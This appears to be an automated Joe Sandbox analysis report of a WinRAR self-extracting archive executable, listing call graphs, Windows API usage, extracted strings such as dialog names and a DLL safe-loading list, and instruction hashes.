7ff7f4d74b78 22693->22703 22694->22686 22695 7ff7f4d74afc 22694->22695 22694->22698 22697 7ff7f4d74ff4 120 API calls 22695->22697 22696 
7ff7f4d74b7c 22696->22698 22700 7ff7f4d74d35 22696->22700 22697->22698 22698->22687 22699 7ff7f4d74c0c 22712 7ff7f4d7a160 34 API calls 22699->22712 22701 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22700->22701 22704 7ff7f4d74d3a 22701->22704 22703->22696 22703->22699 22705 7ff7f4d74c1e 22703->22705 22713 7ff7f4d6ccfc 49 API calls 2 library calls 22705->22713 22706 7ff7f4d74c1c 22707 7ff7f4d68e0c 33 API calls 22706->22707 22708 7ff7f4d74c6a 22707->22708 22708->22686 22708->22696 22708->22700 22710->22553 22711->22692 22713->22706 22714->22559 22715->22106 22716->22112 22717->22115 22943 7ff7f4d84936 14 API calls _com_raise_error 21451 7ff7f4d6e71c 21454 7ff7f4d6e77c SystemTimeToFileTime 21451->21454 21455 7ff7f4d6e7ee 21454->21455 21462 7ff7f4d6e873 21454->21462 21456 7ff7f4d66768 9 API calls 21455->21456 21458 7ff7f4d6e7f3 21456->21458 21457 7ff7f4d85bf0 _handle_error 8 API calls 21459 7ff7f4d6e777 21457->21459 21460 7ff7f4d6e7fe LocalFileTimeToFileTime 21458->21460 21461 7ff7f4d6e80a FileTimeToSystemTime TzSpecificLocalTimeToSystemTime SystemTimeToFileTime SystemTimeToFileTime 21458->21461 21460->21462 21461->21462 21462->21457 21495 7ff7f4d90e1c 21496 7ff7f4d90e67 21495->21496 21500 7ff7f4d90e2b abort 21495->21500 21502 7ff7f4d90b6c 15 API calls _set_errno_from_matherr 21496->21502 21498 7ff7f4d90e4e RtlAllocateHeap 21499 7ff7f4d90e65 21498->21499 21498->21500 21500->21496 21500->21498 21501 7ff7f4d8f088 abort 2 API calls 21500->21501 21501->21500 21502->21499 22760 7ff7f4d73e28 22761 7ff7f4d73e8a 22760->22761 22764 7ff7f4d73ecd 22760->22764 22809 7ff7f4d74eac 22761->22809 22766 7ff7f4d73f7c 22764->22766 22807 7ff7f4d64c40 101 API calls 22764->22807 22765 7ff7f4d6552c 56 API calls 22767 7ff7f4d73ea5 22765->22767 22768 7ff7f4d73fa8 22766->22768 22787 7ff7f4d74011 22766->22787 22769 7ff7f4d74eac 59 API calls 22767->22769 22771 7ff7f4d73feb 22768->22771 22775 7ff7f4d73fb2 22768->22775 22772 7ff7f4d73eaa 22769->22772 22770 7ff7f4d73f54 22825 
7ff7f4d64e00 SetEndOfFile 22770->22825 22826 7ff7f4d75b28 22771->22826 22772->22764 22776 7ff7f4d73eae 22772->22776 22846 7ff7f4d64160 82 API calls 22775->22846 22845 7ff7f4d63a9c 99 API calls 22776->22845 22777 7ff7f4d73f60 22808 7ff7f4d64c40 101 API calls 22777->22808 22781 7ff7f4d73ec4 22785 7ff7f4d85bf0 _handle_error 8 API calls 22781->22785 22782 7ff7f4d73ff9 22788 7ff7f4d74130 22782->22788 22863 7ff7f4d63c7c 82 API calls 22782->22863 22783 7ff7f4d73fc8 22783->22781 22786 7ff7f4d74908 106 API calls 22783->22786 22784 7ff7f4d74d3c 104 API calls 22784->22782 22789 7ff7f4d742b8 22785->22789 22790 7ff7f4d73fdb 22786->22790 22804 7ff7f4d740f4 22787->22804 22847 7ff7f4d750e4 22787->22847 22856 7ff7f4d700ac 22787->22856 22859 7ff7f4d74d3c 22787->22859 22795 7ff7f4d741c5 22788->22795 22864 7ff7f4d78d74 8 API calls 22788->22864 22793 7ff7f4d65790 51 API calls 22790->22793 22793->22781 22797 7ff7f4d7420c 22795->22797 22865 7ff7f4d638e0 82 API calls 2 library calls 22795->22865 22796 7ff7f4d74156 22796->22795 22806 7ff7f4d750e4 120 API calls 22796->22806 22798 7ff7f4d74289 22797->22798 22799 7ff7f4d74297 22797->22799 22866 7ff7f4d64e00 SetEndOfFile 22797->22866 22798->22799 22837 7ff7f4d74908 22798->22837 22799->22781 22803 7ff7f4d65790 51 API calls 22799->22803 22803->22781 22804->22782 22804->22784 22806->22796 22807->22770 22808->22766 22810 7ff7f4d66288 55 API calls 22809->22810 22811 7ff7f4d74f0a 22810->22811 22812 7ff7f4d74f23 22811->22812 22814 7ff7f4d74f1b 22811->22814 22813 7ff7f4d85aa0 4 API calls 22812->22813 22816 7ff7f4d74f2d 22813->22816 22867 7ff7f4d65db0 51 API calls 2 library calls 22814->22867 22817 7ff7f4d64334 51 API calls 22816->22817 22819 7ff7f4d74f5c 22817->22819 22818 7ff7f4d74fc3 22820 7ff7f4d85bf0 _handle_error 8 API calls 22818->22820 22819->22818 22821 7ff7f4d74feb 22819->22821 22822 7ff7f4d73e8f 22820->22822 22823 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22821->22823 22822->22764 22822->22765 22824 7ff7f4d74ff0 
22823->22824 22825->22777 22831 7ff7f4d75b61 22826->22831 22827 7ff7f4d750e4 120 API calls 22827->22831 22831->22827 22832 7ff7f4d700ac SendDlgItemMessageW 22831->22832 22833 7ff7f4d75dd6 22831->22833 22834 7ff7f4d75d59 22831->22834 22836 7ff7f4d64d50 101 API calls 22831->22836 22868 7ff7f4d7625c 22831->22868 22890 7ff7f4d76b28 22831->22890 22899 7ff7f4d76964 125 API calls _handle_error 22831->22899 22832->22831 22833->22782 22834->22833 22835 7ff7f4d74d3c 104 API calls 22834->22835 22835->22833 22836->22831 22838 7ff7f4d74922 22837->22838 22843 7ff7f4d7497a 22837->22843 22909 7ff7f4d64c70 22838->22909 22840 7ff7f4d74966 22844 7ff7f4d642d0 100 API calls 22840->22844 22841 7ff7f4d749f5 22841->22799 22842 7ff7f4d65ff4 51 API calls 22842->22841 22843->22841 22843->22842 22844->22843 22845->22781 22846->22783 22848 7ff7f4d750ff 22847->22848 22854 7ff7f4d750f7 22847->22854 22849 7ff7f4d75384 120 API calls 22848->22849 22851 7ff7f4d75152 22848->22851 22848->22854 22850 7ff7f4d7513e 22849->22850 22850->22851 22852 7ff7f4d751a9 22850->22852 22850->22854 22851->22854 22914 7ff7f4d78d2c 8 API calls 22851->22914 22915 7ff7f4d63df0 99 API calls 2 library calls 22852->22915 22854->22787 22856->22787 22857 7ff7f4d83a40 22856->22857 22858 7ff7f4d83a4f SendDlgItemMessageW 22857->22858 22860 7ff7f4d74d75 22859->22860 22861 7ff7f4d74d9b 22860->22861 22916 7ff7f4d64e18 22860->22916 22861->22787 22863->22788 22864->22796 22865->22797 22866->22798 22867->22812 22870 7ff7f4d762b3 memcpy_s 22868->22870 22869 7ff7f4d750e4 120 API calls 22869->22870 22870->22869 22872 7ff7f4d76305 22870->22872 22871 7ff7f4d750e4 120 API calls 22871->22872 22872->22871 22874 7ff7f4d76367 22872->22874 22889 7ff7f4d764d2 22872->22889 22873 7ff7f4d85bf0 _handle_error 8 API calls 22875 7ff7f4d76943 22873->22875 22876 7ff7f4d750e4 120 API calls 22874->22876 22877 7ff7f4d763c0 22874->22877 22874->22889 22875->22831 22876->22874 22878 7ff7f4d7646a 22877->22878 22880 7ff7f4d750e4 120 API calls 22877->22880 
22877->22889 22900 7ff7f4d75664 22878->22900 22880->22877 22881 7ff7f4d76714 22883 7ff7f4d75664 8 API calls 22881->22883 22882 7ff7f4d764c8 22882->22881 22884 7ff7f4d750e4 120 API calls 22882->22884 22882->22889 22885 7ff7f4d76788 22883->22885 22884->22882 22886 7ff7f4d75664 8 API calls 22885->22886 22885->22889 22887 7ff7f4d7685e 22886->22887 22887->22889 22904 7ff7f4d75e0c 22887->22904 22889->22873 22893 7ff7f4d76b70 22890->22893 22891 7ff7f4d750e4 120 API calls 22891->22893 22892 7ff7f4d76ba7 22894 7ff7f4d750e4 120 API calls 22892->22894 22895 7ff7f4d76bb6 22892->22895 22898 7ff7f4d76bf5 22892->22898 22893->22891 22893->22892 22894->22892 22895->22831 22896 7ff7f4d750e4 120 API calls 22896->22898 22897 7ff7f4d74d3c 104 API calls 22897->22898 22898->22895 22898->22896 22898->22897 22899->22831 22903 7ff7f4d756c6 memcpy_s 22900->22903 22901 7ff7f4d85bf0 _handle_error 8 API calls 22902 7ff7f4d75ab1 22901->22902 22902->22882 22903->22901 22908 7ff7f4d75e6f 22904->22908 22905 7ff7f4d76228 22905->22889 22906 7ff7f4d74d3c 104 API calls 22906->22908 22907 7ff7f4d750e4 120 API calls 22907->22908 22908->22905 22908->22906 22908->22907 22910 7ff7f4d64c94 22909->22910 22913 7ff7f4d64ca4 22909->22913 22911 7ff7f4d64c9a FlushFileBuffers 22910->22911 22910->22913 22911->22913 22912 7ff7f4d64d0e SetFileTime 22912->22840 22913->22912 22915->22854 22917 7ff7f4d64e4b 22916->22917 22918 7ff7f4d64e44 22916->22918 22919 7ff7f4d64e55 GetStdHandle 22917->22919 22925 7ff7f4d64e63 22917->22925 22920 7ff7f4d85bf0 _handle_error 8 API calls 22918->22920 22919->22925 22921 7ff7f4d64fee 22920->22921 22921->22861 22922 7ff7f4d64ebe WriteFile 22922->22925 22923 7ff7f4d64e7e WriteFile 22924 7ff7f4d64eb4 22923->22924 22923->22925 22924->22923 22924->22925 22925->22918 22925->22922 22925->22923 22927 7ff7f4d64f56 22925->22927 22935 7ff7f4d63a18 101 API calls 22925->22935 22928 7ff7f4d612bc 33 API calls 22927->22928 22929 7ff7f4d64f85 22928->22929 22936 7ff7f4d64190 99 API calls 
Concurrency::cancel_current_task 22929->22936 22935->22925

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$AddressProc$DirectoryHandleLibraryLoadModuleSystem
                                                        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                        • API String ID: 751436351-2013832382
                                                        • Opcode ID: 4c8ee9132ef04ca432ae846c1f1bfdea82b2824a45e1760f6555dcb5b633aa6a
                                                        • Instruction ID: 321cbd605bf145814ff23141c9b857d3ffc69c3c09062a3c362f1be26395003f
                                                        • Opcode Fuzzy Hash: 4c8ee9132ef04ca432ae846c1f1bfdea82b2824a45e1760f6555dcb5b633aa6a
                                                        • Instruction Fuzzy Hash: 8B623D31A09F86EAEB11AF66E8801E9B3A4FF45754F800236DB6D567E5EF38D144C390
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Similarity
                                                        • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
                                                        • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                        • API String ID: 3303814210-2702805183
                                                        • Opcode ID: 0e6596488270f79310c24a623b396e3ada833de9f399a29ee3400fe31d1444bd
                                                        • Instruction ID: 1df7a7ee4a87ecd9425d166de2d071e4689466c3218fefd76de6f762c04acfcb
                                                        • Opcode Fuzzy Hash: 0e6596488270f79310c24a623b396e3ada833de9f399a29ee3400fe31d1444bd
                                                        • Instruction Fuzzy Hash: 39D28361A1968297EB20BF26E8D42B9B351FF85780FC04135DB6D467E6EE3CE544C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
                                                        • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                        • API String ID: 1830998149-3916287355
                                                        • Opcode ID: 807802d1ee62223aa11093229eb9230b514b44183e94545dd0aead310ba56b57
                                                        • Instruction ID: e98a11ef90e88e2d84d4626040720f3e346cece564047067bd4f4901f8deaa68
                                                        • Opcode Fuzzy Hash: 807802d1ee62223aa11093229eb9230b514b44183e94545dd0aead310ba56b57
                                                        • Instruction Fuzzy Hash: 4F13A122B04B829AEB10AF66D8C02FC77A5FB41798F900535DB2D57AD9DF38D584C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph: function entry 7ff7f4d83fcc; Windows APIs referenced by the graph nodes: GetCommandLineW, SetEnvironmentVariableW, GetLocalTime, GetModuleHandleW, LoadIconW, DialogBoxParamW, Sleep, OpenFileMappingW, MapViewOfFile, UnmapViewOfFile, CloseHandle, DeleteObject (rendered graph edge data not reproduced)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: File$EnvironmentHandleVariableView_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                        • API String ID: 3767324925-3710569615
                                                        • Opcode ID: 8342291cec4698ce4c2f469f806b384fae520f8f901e271fb65461c60124e97c
                                                        • Instruction ID: 4384dc80ac407c08fab43e31edc0862fc735762a9f3e532f5bed864d269ebcd6
                                                        • Opcode Fuzzy Hash: 8342291cec4698ce4c2f469f806b384fae520f8f901e271fb65461c60124e97c
                                                        • Instruction Fuzzy Hash: 2D428361A19A8682EB14EF26E8D42BDB365FF45B84FC04235DB6D46AD5EF3CD140C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                                        • String ID: $%s:$CAPTION
                                                        • API String ID: 1936833115-404845831
                                                        • Opcode ID: 011115dc4585d9970c797897bd28b3e1a41ac96c674e0d9f4ec2e8e75e10504b
                                                        • Instruction ID: 91a6aec3b3f3b6e5176dcb0bdcadc7504d9db68c9493f8e146a8a047409d35a6
                                                        • Opcode Fuzzy Hash: 011115dc4585d9970c797897bd28b3e1a41ac96c674e0d9f4ec2e8e75e10504b
                                                        • Instruction Fuzzy Hash: 3091D532A1864187D718EF2AE8806A9F7A1F785784F845035EF9947BD8DE3CE8058B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                                        • String ID: PNG
                                                        • API String ID: 4097654274-364855578
                                                        • Opcode ID: 75966c197c38ca84d354d4050cb608c385baf803c2fd171f6e68603f3e230818
                                                        • Instruction ID: a66cdd1434975386c72eca226be9f22cc3be3f2234a66c8347ea1dc9195db73b
                                                        • Opcode Fuzzy Hash: 75966c197c38ca84d354d4050cb608c385baf803c2fd171f6e68603f3e230818
                                                        • Instruction Fuzzy Hash: 9041FA21A19A0687EF24AF17D894379B3A0BF84FD5F844435CB2D877E4EE6CE44483A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph: function entry 7ff7f4d6647c; Windows APIs referenced by the graph nodes: FindFirstFileW, FindNextFileW, GetLastError (rendered graph edge data not reproduced)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                        • String ID:
                                                        • API String ID: 474548282-0
                                                        • Opcode ID: 2505ee538facd5d676127887e6a3cdef276b9a3b5015208b56b412facb3bef77
                                                        • Instruction ID: 8aca715991f2ecc99cc64393519dc91944b347a99dc079e77b2182ac311a5b11
                                                        • Opcode Fuzzy Hash: 2505ee538facd5d676127887e6a3cdef276b9a3b5015208b56b412facb3bef77
                                                        • Instruction Fuzzy Hash: DD619F72A09A4692EB10AF16E48526DB361FB95BA4F804331EBBD43BD9DF3CD444CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: c
                                                        • API String ID: 0-112844655
                                                        • Opcode ID: 628bd18d13ee1dd4a8e7c04dfde5140cfc875f22c02a5843f1e153c5d6109dfb
                                                        • Instruction ID: a9c91fbf33ec8b1691a20fcf3e52423993dda3133d609ac094d260ade4f2043d
                                                        • Opcode Fuzzy Hash: 628bd18d13ee1dd4a8e7c04dfde5140cfc875f22c02a5843f1e153c5d6109dfb
                                                        • Instruction Fuzzy Hash: DEE1D433A286958BE724DF2AD4902ADB7A1F788748F544139DB6953FC8DB3DE840CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 544f42cc12b939a1891eee1881038e0693ac490cd5fb5653c4ab6d0a3e854567
                                                        • Instruction ID: 389cc0453334962765198dd26c1783f48dc5dbb9af030c323e63205ec01fbdd0
                                                        • Opcode Fuzzy Hash: 544f42cc12b939a1891eee1881038e0693ac490cd5fb5653c4ab6d0a3e854567
                                                        • Instruction Fuzzy Hash: 92228E62E2C55283EF24AF16D4D4279F690BF407A8F980136DB7D467D5EE2DE80187E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph: function entry 7ff7f4d85350; Windows APIs referenced by the graph nodes: RaiseException, LoadLibraryExA, GetLastError, GetProcAddress, FreeLibrary (rendered graph edge data not reproduced)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: DloadSection$AccessWrite$ExceptionProtectRaiseRelease$AcquireErrorLastLibraryLoad
                                                        • String ID: H
                                                        • API String ID: 282135826-2852464175
                                                        • Opcode ID: 813d2af946dbcc1b467ff82581fe860ff59ffe329b4d6e3d6bcaf1691afa70ed
                                                        • Instruction ID: 83f6009359434ee364a837ba1aedc62c2a1721158b0d03ab5bfcb199cb71bedb
                                                        • Opcode Fuzzy Hash: 813d2af946dbcc1b467ff82581fe860ff59ffe329b4d6e3d6bcaf1691afa70ed
                                                        • Instruction Fuzzy Hash: 07914D32A05B598BFB00EF66D8946BCB3A1BB08B98B854435DF1D17B94EF38E445C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00007FF7F4D69254: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F4D69389
                                                        • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F4D6A375
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D6A82F
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D6A835
                                                          • Part of subcall function 00007FF7F4D702F8: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7F4D69CBA), ref: 00007FF7F4D70325
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                        • API String ID: 3629253777-3268106645
                                                        • Opcode ID: 0119fbbe3327ba141a7f55d4cd9843eb37e83c3fd0627bc7f4021d3c2ce17c58
